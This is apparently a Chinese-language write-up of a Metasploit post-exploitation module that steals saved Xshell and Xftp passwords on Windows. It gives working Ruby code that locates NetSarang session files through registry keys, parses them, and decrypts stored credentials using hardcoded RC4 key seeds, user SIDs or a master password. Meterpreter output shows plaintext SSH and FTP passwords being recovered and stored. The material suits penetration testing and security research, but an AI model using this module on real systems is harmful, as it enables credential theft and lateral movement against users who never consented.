前言

思路

找session文件

include Msf::Post::Windows::UserProfiles
profiles = grab_user_profiles
profiles.each do |user_profiles|
	next if user_profiles['SID'].nil?

parent_key_6 = "HKEY_USERS\\\\\\\\#{user_profiles['SID']}\\\\\\\\Software\\\\\\\\NetSarang\\\\\\\\Common\\\\\\\\6\\\\\\\\UserData"
parent_key_5 = "HKEY_USERS\\\\\\\\#{user_profiles['SID']}\\\\\\\\Software\\\\\\\\NetSarang\\\\\\\\Common\\\\\\\\5\\\\\\\\UserData"

net_sarang_path_6 = expand_path(registry_getvaldata(parent_key_6, 'UserDataPath'))
net_sarang_path_5 = expand_path(registry_getvaldata(parent_key_5, 'UserDataPath'))

解析session配置文件

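# Normalise a raw session-file body to a UTF-8 string by inspecting its BOM.
#
# version 6.0 The character set of the session file will use Unicode
# version <= 5.3 The character set of the session file will use ANSI
#
# The BOM is compared on the raw bytes (String#b) so that a body already
# tagged with a multibyte encoding cannot confuse the first-byte checks, and
# the BOM itself is stripped in every branch so the INI parser sees the first
# section header at offset 0.
#
# @param data [String, nil] file contents as read from disk
# @return [String] UTF-8 text for BOM-tagged input; otherwise `data` unchanged
#   (ANSI files without a BOM, or nil)
def try_encode_file(data)
	return data if data.nil?

	bytes = data.b
	if bytes.byteslice(0, 2) == "\xFF\xFE".b
		# FFFE: UTF-16 little endian
		bytes.byteslice(2..-1).force_encoding('UTF-16LE').encode('UTF-8')
	elsif bytes.byteslice(0, 3) == "\xEF\xBB\xBF".b
		# EFBBBF: UTF-8 with BOM (the original check looked for FE BB BF)
		bytes.byteslice(3..-1).force_encoding('UTF-8')
	elsif bytes.byteslice(0, 2) == "\xFE\xFF".b
		# FEFF: UTF-16 big endian
		bytes.byteslice(2..-1).force_encoding('UTF-16BE').encode('UTF-8')
	else
		data
	end
end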

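# parser xsh session file
#
# @param ini [Hash] parsed .xsh INI contents, keyed by section name and then
#   by key name (e.g. ini['CONNECTION']['Host'])
# @return [Array] [version, host, port, username, password]; an element is nil
#   when its section or key is absent (Hash#dig) rather than raising
#   NoMethodError on a malformed file
def parser_xsh(ini)
	version = ini.dig('SessionInfo', 'Version')
	port = ini.dig('CONNECTION', 'Port')
	host = ini.dig('CONNECTION', 'Host')
	username = ini.dig('CONNECTION:AUTHENTICATION', 'UserName')
	# Password is optional: a session may store no credential at all.
	password = ini.dig('CONNECTION:AUTHENTICATION', 'Password')
	[version, host, port, username, password]
end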

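# parser xfp session file
#
# @param ini [Hash] parsed .xfp INI contents, keyed by section name and then
#   by key name (e.g. ini['Connection']['Host']); note the section casing
#   differs from .xsh files
# @return [Array] [version, host, port, username, password]; an element is nil
#   when its section or key is absent (Hash#dig) rather than raising
#   NoMethodError on a malformed file
def parser_xfp(ini)
	version = ini.dig('SessionInfo', 'Version')
	port = ini.dig('Connection', 'Port')
	host = ini.dig('Connection', 'Host')
	username = ini.dig('Connection', 'UserName')
	password = ini.dig('Connection', 'Password')
	[version, host, port, username, password]
end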

解密密文

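class NetSarangCrypto
    attr_accessor :version
    attr_accessor :username
    attr_accessor :sid
    attr_accessor :master_password
    attr_accessor :key

    # Length in bytes of the SHA-256 checksum that #encrypt_string appends to
    # the RC4 ciphertext for session-file versions >= 5.1.
    CHECKSUM_LEN = 0x20

    # This class implements encryption and decryption of NetSarang (Xshell /
    # Xftp) session-file passwords. The RC4 key depends on the file version:
    #   version <  5.1        : MD5 of a fixed, product-specific string
    #   5.1 <= version <= 5.2 : SHA-256 of the user's SID
    #   version >  5.2        : SHA-256 of username + SID, or of the master
    #                           password when one is supplied
    #
    # @param type [String] only xshell or xftp.
    # @param version [String] Specify version of session file. e.g.:5.3
    # @param username [String] Specify username. This parameter will be used if version > 5.2.
    # @param sid [String] Specify SID. This parameter will be used if version >= 5.1.
    # @option master_password [String] Specify user's master password.
    #
    # @raise [RuntimeError] when version does not parse to a positive number
    # @return [Rex::Parser::NetSarang::NetSarangCrypto] The NetSarangCrypto object
    def initialize(type, version, username, sid, master_password = nil)
        self.version = version.to_f
        self.username = username
        self.sid = sid
        self.master_password = master_password
        if (self.version > 0) && (self.version < 5.1)
            seed = (type == 'xshell') ? '!X@s#h$e%l^l&' : '!X@s#c$e%l^l&'
            self.key = OpenSSL::Digest::MD5.digest(seed)
        elsif (self.version >= 5.1) && (self.version <= 5.2)
            self.key = OpenSSL::Digest::SHA256.digest(self.sid)
        elsif self.version > 5.2
            # A master password, when set, replaces the per-user key material.
            if self.master_password.nil?
                self.key = OpenSSL::Digest::SHA256.digest(self.username + self.sid)
            else
                self.key = OpenSSL::Digest::SHA256.digest(self.master_password)
            end
        else
            raise 'Invalid argument: version'
        end
    end

    # Encrypt
    #
    # @param string [String] plaintext password
    # @return [String] base64 ciphertext; for version >= 5.1 the RC4 output is
    #   followed by SHA-256(plaintext) so the decryptor can verify the key
    def encrypt_string(string)
        cipher = Rex::Crypto.rc4(key, string)
        return Rex::Text.encode_base64(cipher) if version < 5.1

        checksum = OpenSSL::Digest::SHA256.digest(string)
        Rex::Text.encode_base64(cipher + checksum)
    end

    # Decrypt
    #
    # @param string [String] base64 ciphertext as stored in the session file
    # @return [String] plaintext, for version < 5.1 (no checksum exists to verify)
    # @return [Array(String, true), Array(nil, false)] plaintext, is_valid for
    #   version >= 5.1; is_valid is true only when SHA-256(plaintext) matches the
    #   trailing checksum, i.e. the key (SID / username / MASTER_PASSWORD) was right
    def decrypt_string(string)
        data = Rex::Text.decode_base64(string)
        return Rex::Crypto.rc4(key, data) if version < 5.1

        # Blob too short to carry a checksum: cannot be a valid >= 5.1 record.
        return [nil, false] if data.length < CHECKSUM_LEN

        ciphertext = data[0, data.length - CHECKSUM_LEN]
        checksum = data[-CHECKSUM_LEN, CHECKSUM_LEN]
        plaintext = Rex::Crypto.rc4(key, ciphertext)
        # Verify against the checksum #encrypt_string appends instead of
        # guessing validity from whether the bytes happen to be UTF-8; a wrong
        # key yields pseudo-random output that can pass such a heuristic.
        if OpenSSL::Digest::SHA256.digest(plaintext) == checksum
            [plaintext, true]
        else
            [nil, false]
        end
    end
end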

信息入库

Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------
192.168.76.1    192.168.76.132  2121/tcp (ftp)  lftpd     lftpd      Password
192.168.76.1    192.168.76.132  2121/tcp (ftp)  lftpd                Blank password
192.168.76.134  192.168.76.132  22/tcp (ssh)    kt        123456

使用方法

meterpreter > run post/windows/gather/credentials/xshell_xftp_password

[-] Unexpected Windows error 1332
UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang
====================================================

Type         Name                           Host            Port  UserName  Plaintext  Password
----         ----                           ----            ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp                   192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  新建会话 - 副本 (2).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (3).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (4).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本.xsh            192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话.xsh                   192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=

[-] Invalid MASTER_PASSWORD, Decryption failed!
UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang Computer\\\\6
===============================================================

Type         Name              Host          Port  UserName  Plaintext  Password
----         ----              ----          ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp      192.168.76.1  2121  lftpd                sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V6.0  新建会话.xsh                    22    kt

meterpreter >

meterpreter > run post/windows/gather/credentials/xshell_xftp_password MASTER_PASSWORD=123456

[-] Unexpected Windows error 1332
UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang
====================================================

Type         Name                           Host            Port  UserName  Plaintext  Password
----         ----                           ----            ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp                   192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  新建会话 - 副本 (2).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (3).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (4).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本.xsh            192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话.xsh                   192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=

UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang Computer\\\\6
===============================================================

Type         Name              Host          Port  UserName  Plaintext  Password
----         ----              ----          ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp      192.168.76.1  2121  lftpd     lftpd      sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V6.0  新建会话.xsh                    22    kt

meterpreter >

https://github.com/rapid7/metasploit-framework/pull/13525
